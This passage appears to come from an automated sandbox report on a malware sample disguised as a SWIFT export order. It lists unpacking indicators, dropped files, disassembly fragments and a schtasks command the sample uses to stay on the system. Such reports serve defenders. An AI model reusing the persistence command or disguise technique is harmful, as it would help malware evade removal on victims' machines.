          Source: Binary string: wntdll.pdb source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000003.262649422.0000000001200000.00000004.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353122475.00000000013A0000.00000040.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353352126.00000000014BF000.00000040.00000001.sdmp, help.exe, help.exe, 00000014.00000002.506159305.000000000305F000.00000040.00000001.sdmp, help.exe, 00000014.00000002.505506351.0000000002F40000.00000040.00000001.sdmp
          Source: Binary string: help.pdbGCTL source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353029451.0000000000F70000.00000040.00020000.sdmp
          Source: Binary string: help.pdb source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353029451.0000000000F70000.00000040.00020000.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: AnsPejV.exe.0.dr, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.7e0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.7e0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.8f0000.7.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.8f0000.3.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.8f0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.8f0000.9.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.8f0000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.8f0000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.8f0000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.8f0000.5.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 0_2_007E92F5 push ds; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 0_2_007E9361 push ds; retf
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 0_2_007E9347 push ds; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 0_2_052A56E0 push esp; iretd
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041B842 push eax; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041B84B push eax; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041C871 push 67D4EBBAh; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_00415022 push ebx; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041C027 push 67D4EBBAh; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041B8E6 push 67D4EBBAh; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041B8AC push eax; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_00406124 push edx; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041C196 push 67D4EBBAh; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_004151AC push 53C4372Dh; iretd
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041BB0C push 67D4EBBAh; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_00419B23 push esp; iretd
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041BC18 push 67D4EBBAh; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_00414CAE push ds; retf
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041C575 push 67D4EBBAh; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041C6BB push 67D4EBBAh; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041B7F5 push eax; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_008F92F5 push ds; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_008F9347 push ds; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_008F9361 push ds; retf
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0141D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FBD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_006CC871 push 67D4EBBAh; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_006CB84B push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_006CB842 push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_006CC027 push 67D4EBBAh; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_006C5022 push ebx; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85893644673
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85893644673
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeFile created: C:\Users\user\AppData\Roaming\AnsPejV.exeJump to dropped file

          Boot Survival:

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnsPejV" /XML "C:\Users\user\AppData\Local\Temp\tmp3FD.tmp
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
